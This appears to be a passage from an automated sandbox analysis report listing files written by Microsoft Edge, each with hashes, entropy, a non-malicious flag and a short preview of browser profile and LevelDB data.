                                                                                                            SHA-512:6E313523EAD6A8BF387AF7471F5E9FC48F226B82FAA7C55795E1EE9986F649107B05C06FFACE02AA14E1786442381AB9062BB93E589DA5C01BD6697462C7688B
                                                                                                            Malicious:false
                                                                                                            Preview:2024/12/05-04:39:47.415 e48 Creating DB C:\Users\user\AppData\Local\Temp\chr6EA4.tmp\Default\shared_proto_db since it was missing..
                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                            File Type:OpenPGP Secret Key
                                                                                                            Category:dropped
                                                                                                            Size (bytes):41
                                                                                                            Entropy (8bit):4.704993772857998
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:3:scoBAIxQRDKIVjn:scoBY7jn
                                                                                                            MD5:5AF87DFD673BA2115E2FCF5CFDB727AB
                                                                                                            SHA1:D5B5BBF396DC291274584EF71F444F420B6056F1
                                                                                                            SHA-256:F9D31B278E215EB0D0E9CD709EDFA037E828F36214AB7906F612160FEAD4B2B4
                                                                                                            SHA-512:DE34583A7DBAFE4DD0DC0601E8F6906B9BC6A00C56C9323561204F77ABBC0DC9007C480FFE4092FF2F194D54616CAF50AECBD4A1E9583CAE0C76AD6DD7C2375B
                                                                                                            Malicious:false
                                                                                                            Preview:.|.."....leveldb.BytewiseComparator......
                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                            File Type:ASCII text
                                                                                                            Category:dropped
                                                                                                            Size (bytes):16
                                                                                                            Entropy (8bit):3.2743974703476995
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:3:1sjgWIV//Uv:1qIFUv
                                                                                                            MD5:46295CAC801E5D4857D09837238A6394
                                                                                                            SHA1:44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
                                                                                                            SHA-256:0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
                                                                                                            SHA-512:8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
                                                                                                            Malicious:false
                                                                                                            Preview:MANIFEST-000001.
                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                            File Type:data
                                                                                                            Category:dropped
                                                                                                            Size (bytes):34
                                                                                                            Entropy (8bit):3.2608241254905095
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:3:G0XttkJcsn:G0Xtqcs
                                                                                                            MD5:144F9E14F35606E2067B5DF655E3102E
                                                                                                            SHA1:B16B22A620A679A811068E67C65C67F97500BEC9
                                                                                                            SHA-256:BCA6A12EEF67DFB649266150CA95D24212F5F566182B85267694969575C5AB4C
                                                                                                            SHA-512:9C148840D66B9D7C2C55668A25E2D2AAE328A4F11016D440C7F5D930D53ABA0DC3DFF74552EC18A89EEBD370B09BD0A5F21A70F8A0D8B1847D1FE40BDFEFA4EC
                                                                                                            Malicious:false
                                                                                                            Preview:.h.6.................__global... .
                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                            File Type:ASCII text
                                                                                                            Category:dropped
                                                                                                            Size (bytes):16
                                                                                                            Entropy (8bit):3.2743974703476995
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:3:1sjgWIV//Uv:1qIFUv
                                                                                                            MD5:46295CAC801E5D4857D09837238A6394
                                                                                                            SHA1:44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
                                                                                                            SHA-256:0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
                                                                                                            SHA-512:8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
                                                                                                            Malicious:false
                                                                                                            Preview:MANIFEST-000001.
                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                            File Type:ASCII text
                                                                                                            Category:dropped
                                                                                                            Size (bytes):287
                                                                                                            Entropy (8bit):5.255892619009469
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:6:YE/81N723fQkrzs52KLlaCa+q2PN723fQkrzAdIFUv:YEEa29LQmvVaDFUv
                                                                                                            MD5:F71DBDB92E96F4D62DF7BD1858448E8E
                                                                                                            SHA1:21EC87F4557917839471BC65C340FF9AD234023B
                                                                                                            SHA-256:E6135F276FD18B4C7A392F5BD8C3DB090B2FF666AFD1515D0B260EED8B287843
                                                                                                            SHA-512:F2C4114A67A72FAF140B5265C85307D89A689CE54529519C97E2BA0C0FF3B09715995F7935DAFF1071F90EC38768CD9429F5273DABDCF58D92D5D537E19B7B8A
                                                                                                            Malicious:false
                                                                                                            Preview:2024/12/05-04:39:47.219 e48 Creating DB C:\Users\user\AppData\Local\Temp\chr6EA4.tmp\Default\shared_proto_db\metadata since it was missing..2024/12/05-04:39:47.413 e48 Reusing MANIFEST C:\Users\user\AppData\Local\Temp\chr6EA4.tmp\Default\shared_proto_db\metadata/MANIFEST-000001.
                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                            File Type:OpenPGP Secret Key
                                                                                                            Category:dropped
                                                                                                            Size (bytes):41
                                                                                                            Entropy (8bit):4.704993772857998
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:3:scoBAIxQRDKIVjn:scoBY7jn
                                                                                                            MD5:5AF87DFD673BA2115E2FCF5CFDB727AB
                                                                                                            SHA1:D5B5BBF396DC291274584EF71F444F420B6056F1
                                                                                                            SHA-256:F9D31B278E215EB0D0E9CD709EDFA037E828F36214AB7906F612160FEAD4B2B4
                                                                                                            SHA-512:DE34583A7DBAFE4DD0DC0601E8F6906B9BC6A00C56C9323561204F77ABBC0DC9007C480FFE4092FF2F194D54616CAF50AECBD4A1E9583CAE0C76AD6DD7C2375B
                                                                                                            Malicious:false
                                                                                                            Preview:.|.."....leveldb.BytewiseComparator......
                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                            Category:dropped
                                                                                                            Size (bytes):13
                                                                                                            Entropy (8bit):2.6612262562697895
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:3:NYLFRQZ:ap2Z
                                                                                                            MD5:B64BD80D877645C2DD14265B1A856F8A
                                                                                                            SHA1:F7379E1A6F8CE062E891C56736C789C7EA77CD6A
                                                                                                            SHA-256:83476CEEEB7682F41030664B4E17305986878D14E82D0C277FB99EC546B44569
                                                                                                            SHA-512:734A7316A269C76DD052D980CC0D5209C0BFEDFFC55B11C58FA25C433CE8A42536827298C3E58CACD68CC01593C23D39350E956E8DE2268D8D29918E1F0667F2
                                                                                                            Malicious:false
                                                                                                            Preview:117.0.2045.55
                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                            File Type:JSON data
                                                                                                            Category:dropped
                                                                                                            Size (bytes):1371
                                                                                                            Entropy (8bit):5.5772966690225365
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:24:YpQBqDPak7u5rrtmP8Iof3Xjomz0z/ayik/JJdXBuBuwBRap0NhFIJX/EYQoTEtw:YuBqDPafkkIe3ToMvkpgBzBRfFIJPE9s
                                                                                                            MD5:B5CB8D732BCBCCE72B1118F726076E69
                                                                                                            SHA1:1804C0271EE7C14D5B1E5ACDD351812F7A81D5A2
                                                                                                            SHA-256:7903CBBDFC9131AFA23B835BF27DD6BD220A32BA865A3F515B6E93092DA2D32A
                                                                                                            SHA-512:2A1D85B353095852DE2B360309C7E5340F589B7477C7392EAF935A16645C4746ADF5241CBB9E9125D8137506D4706506E3E9573E823B68659EC632F6F512B08B
                                                                                                            Malicious:false
                                                                                                            Preview:{"edge":{"perf_center":{"efficiency_mode_v2_is_active":false,"perf_game_mode":true,"performance_mode":3,"performance_mode_is_on":false}},"legacy":{"profile":{"name":{"migrated":true}}},"os_crypt":{"audit_enabled":true,"encrypted_key":"RFBBUEkBAAAA0Iyd3wEV0RGMegDAT8KX6wEAAAD5MRYvJzSqT7x0qUazdvVMEAAAAB4AAABNAGkAYwByAG8AcwBvAGYAdAAgAEUAZABnAGUAAAAQZgAAAAEAACAAAADTfxqgd9n8PJe8GwAfHKHdZgXyLkb5j87vz07w/y+v7AAAAAAOgAAAAAIAACAAAADAa44vTND0cWkZqLZXJKyMKZ7xECoL3XV6wbgYeGH1sTAAAABTdBSMmBCXah60tTx/hJNLulT9b8+o7FsdxfakKIl505QQ89KYkrrXcHWXdL3J8qpAAAAA5KsId0qjGyXc6+aeXDVR9+/JGLprO2WYTQhUa22U9FUEYORZYnhIY2BosQffSdV3NhHQKCXJPzUEkS7QaGPeEg=="},"profile":{"info_cache":{},"profile_counts_reported":"13377865185483849","profiles_order":[]},"smartscreen":{"enabled":true,"pua_protection_enabled":true},"telemetry_client":{"install_source_name":"windows","os_integration_level":5,"updater_version":"1.3.177.11","windows_update_applied":false},"uninstall_metrics":{"installation_date2":"1733391585"},"user_experienc
                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                            File Type:JSON data
                                                                                                            Category:dropped
                                                                                                            Size (bytes):1371
                                                                                                            Entropy (8bit):5.5772966690225365
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:24:YpQBqDPak7u5rrtmP8Iof3Xjomz0z/ayik/JJdXBuBuwBRap0NhFIJX/EYQoTEtw:YuBqDPafkkIe3ToMvkpgBzBRfFIJPE9s
                                                                                                            MD5:B5CB8D732BCBCCE72B1118F726076E69
                                                                                                            SHA1:1804C0271EE7C14D5B1E5ACDD351812F7A81D5A2
                                                                                                            SHA-256:7903CBBDFC9131AFA23B835BF27DD6BD220A32BA865A3F515B6E93092DA2D32A
                                                                                                            SHA-512:2A1D85B353095852DE2B360309C7E5340F589B7477C7392EAF935A16645C4746ADF5241CBB9E9125D8137506D4706506E3E9573E823B68659EC632F6F512B08B
                                                                                                            Malicious:false
                                                                                                            Preview:{"edge":{"perf_center":{"efficiency_mode_v2_is_active":false,"perf_game_mode":true,"performance_mode":3,"performance_mode_is_on":false}},"legacy":{"profile":{"name":{"migrated":true}}},"os_crypt":{"audit_enabled":true,"encrypted_key":"RFBBUEkBAAAA0Iyd3wEV0RGMegDAT8KX6wEAAAD5MRYvJzSqT7x0qUazdvVMEAAAAB4AAABNAGkAYwByAG8AcwBvAGYAdAAgAEUAZABnAGUAAAAQZgAAAAEAACAAAADTfxqgd9n8PJe8GwAfHKHdZgXyLkb5j87vz07w/y+v7AAAAAAOgAAAAAIAACAAAADAa44vTND0cWkZqLZXJKyMKZ7xECoL3XV6wbgYeGH1sTAAAABTdBSMmBCXah60tTx/hJNLulT9b8+o7FsdxfakKIl505QQ89KYkrrXcHWXdL3J8qpAAAAA5KsId0qjGyXc6+aeXDVR9+/JGLprO2WYTQhUa22U9FUEYORZYnhIY2BosQffSdV3NhHQKCXJPzUEkS7QaGPeEg=="},"profile":{"info_cache":{},"profile_counts_reported":"13377865185483849","profiles_order":[]},"smartscreen":{"enabled":true,"pua_protection_enabled":true},"telemetry_client":{"install_source_name":"windows","os_integration_level":5,"updater_version":"1.3.177.11","windows_update_applied":false},"uninstall_metrics":{"installation_date2":"1733391585"},"user_experienc
                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                            File Type:JSON data
                                                                                                            Category:dropped
                                                                                                            Size (bytes):1371
                                                                                                            Entropy (8bit):5.5772966690225365
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:24:YpQBqDPak7u5rrtmP8Iof3Xjomz0z/ayik/JJdXBuBuwBRap0NhFIJX/EYQoTEtw:YuBqDPafkkIe3ToMvkpgBzBRfFIJPE9s
                                                                                                            MD5:B5CB8D732BCBCCE72B1118F726076E69
                                                                                                            SHA1:1804C0271EE7C14D5B1E5ACDD351812F7A81D5A2
                                                                                                            SHA-256:7903CBBDFC9131AFA23B835BF27DD6BD220A32BA865A3F515B6E93092DA2D32A
                                                                                                            SHA-512:2A1D85B353095852DE2B360309C7E5340F589B7477C7392EAF935A16645C4746ADF5241CBB9E9125D8137506D4706506E3E9573E823B68659EC632F6F512B08B
                                                                                                            Malicious:false
                                                                                                            Preview:{"edge":{"perf_center":{"efficiency_mode_v2_is_active":false,"perf_game_mode":true,"performance_mode":3,"performance_mode_is_on":false}},"legacy":{"profile":{"name":{"migrated":true}}},"os_crypt":{"audit_enabled":true,"encrypted_key":"RFBBUEkBAAAA0Iyd3wEV0RGMegDAT8KX6wEAAAD5MRYvJzSqT7x0qUazdvVMEAAAAB4AAABNAGkAYwByAG8AcwBvAGYAdAAgAEUAZABnAGUAAAAQZgAAAAEAACAAAADTfxqgd9n8PJe8GwAfHKHdZgXyLkb5j87vz07w/y+v7AAAAAAOgAAAAAIAACAAAADAa44vTND0cWkZqLZXJKyMKZ7xECoL3XV6wbgYeGH1sTAAAABTdBSMmBCXah60tTx/hJNLulT9b8+o7FsdxfakKIl505QQ89KYkrrXcHWXdL3J8qpAAAAA5KsId0qjGyXc6+aeXDVR9+/JGLprO2WYTQhUa22U9FUEYORZYnhIY2BosQffSdV3NhHQKCXJPzUEkS7QaGPeEg=="},"profile":{"info_cache":{},"profile_counts_reported":"13377865185483849","profiles_order":[]},"smartscreen":{"enabled":true,"pua_protection_enabled":true},"telemetry_client":{"install_source_name":"windows","os_integration_level":5,"updater_version":"1.3.177.11","windows_update_applied":false},"uninstall_metrics":{"installation_date2":"1733391585"},"user_experienc
                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 2, database pages 5, cookie 0x2, schema 4, UTF-8, version-valid-for 2
                                                                                                            Category:dropped
                                                                                                            Size (bytes):20480
                                                                                                            Entropy (8bit):0.46731661083066856
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:12:TL1QAFUxOUDaabZXiDiIF8izX4fhhdWeci2oesJaYi3is25q0S9K0xHZ75fOV:TLiOUOq0afDdWec9sJf5Q7J5fc
                                                                                                            MD5:E93ACF0820CA08E5A5D2D159729F70E3
                                                                                                            SHA1:2C1A4D4924B9AEC1A796F108607404B000877C5D
                                                                                                            SHA-256:F2267FDA7F45499F7A01186B75CEFB799F8D2BC97E2E9B5068952D477294302C
                                                                                                            SHA-512:3BF36C20E04DCF1C16DC794E272F82F68B0DE43F16B4A9746B63B6D6BBC953B00BD7111CDA7AFE85CEBB2C447145483A382B15E2B0A5B36026C3441635D4E50C
                                                                                                            Malicious:false
                                                                                                            Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                            File Type:FoxPro FPT, blocks size 768, next free block index 3284796353, field type 0
                                                                                                            Category:dropped
                                                                                                            Size (bytes):262512
                                                                                                            Entropy (8bit):9.553120663130604E-4
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:3:LsNlqdull:Ls3qdull
                                                                                                            MD5:07E12C0DB74D7E488C46E0A5961D9A49
                                                                                                            SHA1:65BBC596364E6107BBCE667B2D50EE23DF70A859
                                                                                                            SHA-256:707EF9F65769D58E77C82634394051AE6D28E7D6A1CB83091F7AB88D7B188DEF
                                                                                                            SHA-512:DD275821C96B7FC0F6089C1C79920DD6930A60F874DCD1EAE57BDAAC8C477C32EC5C1C408CFFD390E5467DB76C09AE6B382BC6C1789941AB2BEDB39FFC0F7B80
                                                                                                            Malicious:false
                                                                                                            Preview:........................................1.Y.../.........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                            Category:dropped
                                                                                                            Size (bytes):29
                                                                                                            Entropy (8bit):3.922828737239167
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:3:2NGw+K+:fwZ+
                                                                                                            MD5:7BAAFE811F480ACFCCCEE0D744355C79
                                                                                                            SHA1:24B89AE82313084BB8BBEB9AD98A550F41DF7B27
                                                                                                            SHA-256:D5743766AF0312C7B7728219FC24A03A4FB1C2A54A506F337953FBC2C1B847C7
                                                                                                            SHA-512:70FE1C197AF507CC0D65E99807D245C896A40A4271BA1121F9B621980877B43019E584C48780951FC1AD2A5D7D146FC6EA4678139A5B38F9B6F7A5F1E2E86BA3
                                                                                                            Malicious:false
                                                                                                            Preview:customSynchronousLookupUris_0
                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                            File Type:data
                                                                                                            Category:dropped
                                                                                                            Size (bytes):35302
                                                                                                            Entropy (8bit):7.99333285466604
                                                                                                            Encrypted:true
                                                                                                            SSDEEP:768:rRhaFePY38QBsj61g3g01LXoDGPpgb8KbMcnjrQCckBuJyqk3x8cBBT:rLP+TBK6ZQLXSsaMcnHQQcox80
                                                                                                            MD5:0E06E28C3536360DE3486B1A9E5195E8
                                                                                                            SHA1:EB768267F34EC16A6CCD1966DCA4C3C2870268AB
                                                                                                            SHA-256:F2658B1C913A96E75B45E6ADB464C8D796B34AC43BAF1635AA32E16D1752971C
                                                                                                            SHA-512:45F1E909599E2F63372867BC359CF72FD846619DFEB5359E52D5700E0B1BCFFE5FF07606511A3BFFDDD933A0507195439457E4E29A49EB6451F26186B7240041
                                                                                                            Malicious:false
                                                                                                            Preview:.......murmur3.....IN...9.......0..X..#l....C....]......pv..E..........,..?.N?....V..B-.*.F.1....g|..._.>'.-(V... .=.7P.m....#}.r.....>.LE...G.A.h5........J..=..L^-.Zl++,..h..o.y..~j.]u...W...&s.........M..........h3b..[.5.]..V^w.........a.*...6g3..%.gy../{|Z.B..X.}5.]..t.1.H&B.[.).$Y......2....L.t...{...[WE.yy.]..e.v0..\.J3..T.`1Lnh.../..-=w...W.&N7.nz.P...z......'i..R6....../....t.[..&-.....T&l..e....$.8.."....Iq....J.v..|.6.M...zE...a9uw..'.$6.L..m$......NB).JL.G.7}8(`....J.)b.E.m...c.0I.V...|$....;.k.......*8v..l.:..@.F.........K..2...%(...kA......LJd~._A.N.....$3...5....Z"...X=.....%.........6.k.....F..1..l,ia..i.i....y.M..Cl.....*...}.I..r..-+=b.6....%...#...W..K.....=.F....~.....[.......-...../;....~.09..d.....GR..H.lR...m.Huh9.:..A H./)..D.F..Y.n7.....7D.O.a;>Z.K....w...sq..qo3N...8@.zpD.Ku......+.Z=.zNFgP._@.z.ic.......3.....+..j...an%...X..7.q..A.l.7.S2..+....1.s.b..z...@v..!.y...N.C.XQ.p.\..x8(.<.....cq.(
                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                            Category:dropped
                                                                                                            Size (bytes):18
                                                                                                            Entropy (8bit):3.5724312513221195
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:3:kDnaV6bVon:kDYa2
                                                                                                            MD5:5692162977B015E31D5F35F50EFAB9CF
                                                                                                            SHA1:705DC80E8B32AC8B68F7E13CF8A75DCCB251ED7D
                                                                                                            SHA-256:42CCB5159B168DBE5D5DDF026E5F7ED3DBF50873CFE47C7C3EF0677BB07B90D4
                                                                                                            SHA-512:32905A4CC5BCE0FE8502DDD32096F40106625218BEDC4E218A344225D6DF2595A7B70EEB3695DCEFDD894ECB2B66BED479654E8E07F02526648E07ACFE47838C
                                                                                                            Malicious:false
                                                                                                            Preview:edgeSettings_2.0-0
                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                            File Type:JSON data
                                                                                                            Category:dropped
                                                                                                            Size (bytes):3581
                                                                                                            Entropy (8bit):4.459693941095613
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:96:JTMhnytNaSA4BOsNQNhnUZTFGKDIWHCgL5tfHaaJzRHF+P1sYmnfHUdT+GWBH7Y/:KyMot7vjFU
                                                                                                            MD5:BDE38FAE28EC415384B8CFE052306D6C
                                                                                                            SHA1:3019740AF622B58D573C00BF5C98DD77F3FBB5CD
                                                                                                            SHA-256:1F4542614473AE103A5EE3DEEEC61D033A40271CFF891AAA6797534E4DBB4D20
                                                                                                            SHA-512:9C369D69298EBF087412EDA782EE72AFE5448FD0D69EA5141C2744EA5F6C36CDF70A51845CDC174838BAC0ADABDFA70DF6AEDBF6E7867578AE7C4B7805A8B55E
                                                                                                            Malicious:false
                                                                                                            Preview:{"models":[],"geoidMaps":{"gw_my":"https://malaysia.smartscreen.microsoft.com/","gw_tw":"https://taiwan.smartscreen.microsoft.com/","gw_at":"https://austria.smartscreen.microsoft.com/","gw_es":"https://spain.smartscreen.microsoft.com/","gw_pl":"https://poland.smartscreen.microsoft.com/","gw_se":"https://sweden.smartscreen.microsoft.com/","gw_kr":"https://southkorea.smartscreen.microsoft.com/","gw_br":"https://brazil.smartscreen.microsoft.com/","au":"https://australia.smartscreen.microsoft.com/","dk":"https://denmark.smartscreen.microsoft.com/","gw_sg":"https://singapore.smartscreen.microsoft.com/","gw_fr":"https://france.smartscreen.microsoft.com/","gw_ca":"https://canada.smartscreen.microsoft.com/","test":"https://eu-9.smartscreen.microsoft.com/","gw_il":"https://israel.smartscreen.microsoft.com/","gw_au":"https://australia.smartscreen.microsoft.com/","gw_ffl4mod":"https://unitedstates4.ss.wd.microsoft.us/","gw_ffl4":"https://unitedstates1.ss.wd.microsoft.us/","gw_eu":"https://europe.
                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                            Category:dropped
                                                                                                            Size (bytes):47
                                                                                                            Entropy (8bit):4.493433469104717
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:3:kfKbQSQSuLA5:kyUc5
                                                                                                            MD5:3F90757B200B52DCF5FDAC696EFD3D60
                                                                                                            SHA1:569A2E1BED9ECCDF7CD03E270AEF2BD7FF9B0E77
                                                                                                            SHA-256:1EE63F0A3502CFB7DF195FABBA41A7805008AB2CCCDAEB9AF990409D163D60C8
                                                                                                            SHA-512:39252BBAA33130DF50F36178A8EAB1D09165666D8A229FBB3495DD01CBE964F87CD2E6FCD479DFCA36BE06309EF18FEDA7F14722C57545203BBA24972D4835C8
                                                                                                            Malicious:false
                                                                                                            Preview:synchronousLookupUris_636976985063396749.rel.v2
                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                            File Type:data
                                                                                                            Category:dropped
                                                                                                            Size (bytes):35302
                                                                                                            Entropy (8bit):7.99333285466604
                                                                                                            Encrypted:true
                                                                                                            SSDEEP:768:rRhaFePY38QBsj61g3g01LXoDGPpgb8KbMcnjrQCckBuJyqk3x8cBBT:rLP+TBK6ZQLXSsaMcnHQQcox80
                                                                                                            MD5:0E06E28C3536360DE3486B1A9E5195E8
                                                                                                            SHA1:EB768267F34EC16A6CCD1966DCA4C3C2870268AB
                                                                                                            SHA-256:F2658B1C913A96E75B45E6ADB464C8D796B34AC43BAF1635AA32E16D1752971C
                                                                                                            SHA-512:45F1E909599E2F63372867BC359CF72FD846619DFEB5359E52D5700E0B1BCFFE5FF07606511A3BFFDDD933A0507195439457E4E29A49EB6451F26186B7240041
                                                                                                            Malicious:false
                                                                                                            Preview:.......murmur3.....IN...9.......0..X..#l....C....]......pv..E..........,..?.N?....V..B-.*.F.1....g|..._.>'.-(V... .=.7P.m....#}.r.....>.LE...G.A.h5........J..=..L^-.Zl++,..h..o.y..~j.]u...W...&s.........M..........h3b..[.5.]..V^w.........a.*...6g3..%.gy../{|Z.B..X.}5.]..t.1.H&B.[.).$Y......2....L.t...{...[WE.yy.]..e.v0..\.J3..T.`1Lnh.../..-=w...W.&N7.nz.P...z......'i..R6....../....t.[..&-.....T&l..e....$.8.."....Iq....J.v..|.6.M...zE...a9uw..'.$6.L..m$......NB).JL.G.7}8(`....J.)b.E.m...c.0I.V...|$....;.k.......*8v..l.:..@.F.........K..2...%(...kA......LJd~._A.N.....$3...5....Z"...X=.....%.........6.k.....F..1..l,ia..i.i....y.M..Cl.....*...}.I..r..-+=b.6....%...#...W..K.....=.F....~.....[.......-...../;....~.09..d.....GR..H.lR...m.Huh9.:..A H./)..D.F..Y.n7.....7D.O.a;>Z.K....w...sq..qo3N...8@.zpD.Ku......+.Z=.zNFgP._@.z.ic.......3.....+..j...an%...X..7.q..A.l.7.S2..+....1.s.b..z...@v..!.y...N.C.XQ.p.\..x8(.<.....cq.(
                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                            File Type:JSON data
                                                                                                            Category:dropped
                                                                                                            Size (bytes):86
                                                                                                            Entropy (8bit):4.3751917412896075
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:3:YQ3JYq9xSs0dMEJAELJ2rjozQan:YQ3Kq9X0dMgAEwjM
                                                                                                            MD5:961E3604F228B0D10541EBF921500C86
                                                                                                            SHA1:6E00570D9F78D9CFEBE67D4DA5EFE546543949A7
                                                                                                            SHA-256:F7B24F2EB3D5EB0550527490395D2F61C3D2FE74BB9CB345197DAD81B58B5FED
                                                                                                            SHA-512:535F930AFD2EF50282715C7E48859CC2D7B354FF4E6C156B94D5A2815F589B33189FFEDFCAF4456525283E993087F9F560D84CFCF497D189AB8101510A09C472
                                                                                                            Malicious:false
                                                                                                            Preview:{"user_experience_metrics.stability.exited_cleanly":false,"variations_crash_streak":0}
                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                            File Type:JSON data
                                                                                                            Category:dropped
                                                                                                            Size (bytes):3281
                                                                                                            Entropy (8bit):5.603322235336298
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:96:0q8NkC1fkkIe3InkOwYBIO6jv/q2FP0Jk8ccSDS4S4SDSPce4a:/8NbOXbTn2Fsk8CD
                                                                                                            MD5:299F9A0270A915DD6DB7069D80C87CA7
                                                                                                            SHA1:9DF0799A145BEF12FA6CDBC06F4B359C0F455F6B
                                                                                                            SHA-256:641F072E25267FB45F79B1E310A9E233806AFA0105291349107F861C5303FBB6
                                                                                                            SHA-512:30CE33FD9658BF161D5B997DA9D6E9F334ECC1407B7443E9045B294D0D7DC12E92CE5900F00F83461F92B7854DA6D1455D4B1E5B359494774129713C12AE7D53
                                                                                                            Malicious:false
                                                                                                            Preview:{"dual_user":{"ie_to_edge":{"redirection_mode":0}},"edge":{"perf_center":{"efficiency_mode_v2_is_active":false,"perf_game_mode":true,"performance_mode":3,"performance_mode_is_on":false},"tab_stabs":{"closed_without_unfreeze_never_unfrozen":0,"closed_without_unfreeze_previously_unfrozen":0,"discard_without_unfreeze_never_unfrozen":0,"discard_without_unfreeze_previously_unfrozen":0},"tab_stats":{"frozen_daily":0,"unfrozen_daily":0}},"hardware_acceleration_mode_previous":true,"legacy":{"profile":{"name":{"migrated":true}}},"os_crypt":{"audit_enabled":true,"encrypted_key":"RFBBUEkBAAAA0Iyd3wEV0RGMegDAT8KX6wEAAAD5MRYvJzSqT7x0qUazdvVMEAAAAB4AAABNAGkAYwByAG8AcwBvAGYAdAAgAEUAZABnAGUAAAAQZgAAAAEAACAAAADTfxqgd9n8PJe8GwAfHKHdZgXyLkb5j87vz07w/y+v7AAAAAAOgAAAAAIAACAAAADAa44vTND0cWkZqLZXJKyMKZ7xECoL3XV6wbgYeGH1sTAAAABTdBSMmBCXah60tTx/hJNLulT9b8+o7FsdxfakKIl505QQ89KYkrrXcHWXdL3J8qpAAAAA5KsId0qjGyXc6+aeXDVR9+/JGLprO2WYTQhUa22U9FUEYORZYnhIY2BosQffSdV3NhHQKCXJPzUEkS7QaGPeEg=="},"policy":{"last_statist
                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                            File Type:JSON data
                                                                                                            Category:dropped
                                                                                                            Size (bytes):4197
                                                                                                            Entropy (8bit):5.497828493766448
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:96:0q8NkGS1fkkIe3In58rh/cI9URoDotoq11/RBIO6jv/q2FP0Jk8ccSDS4S4SDSPD:/8NBSOXUeoDUdTn2Fsk8CD
                                                                                                            MD5:B6813DCB8CBEE07DCAF31C041E7DD00D
                                                                                                            SHA1:FCBDAB23720D3462BDC24078B955E3992F0814C5
                                                                                                            SHA-256:72D2B33F0194D1745AB303A4F0F174BD96308DE8A5737ED58B72805F0734F457
                                                                                                            SHA-512:DABB4880356D8FEEA94428035B48747B2FB01BB02E66661CE18E78BDCD709EB0EBCDC484BDA755F09563B2377CE3711B4316AF11A79AA7C665CC661DD20CD7C5
                                                                                                            Malicious:false
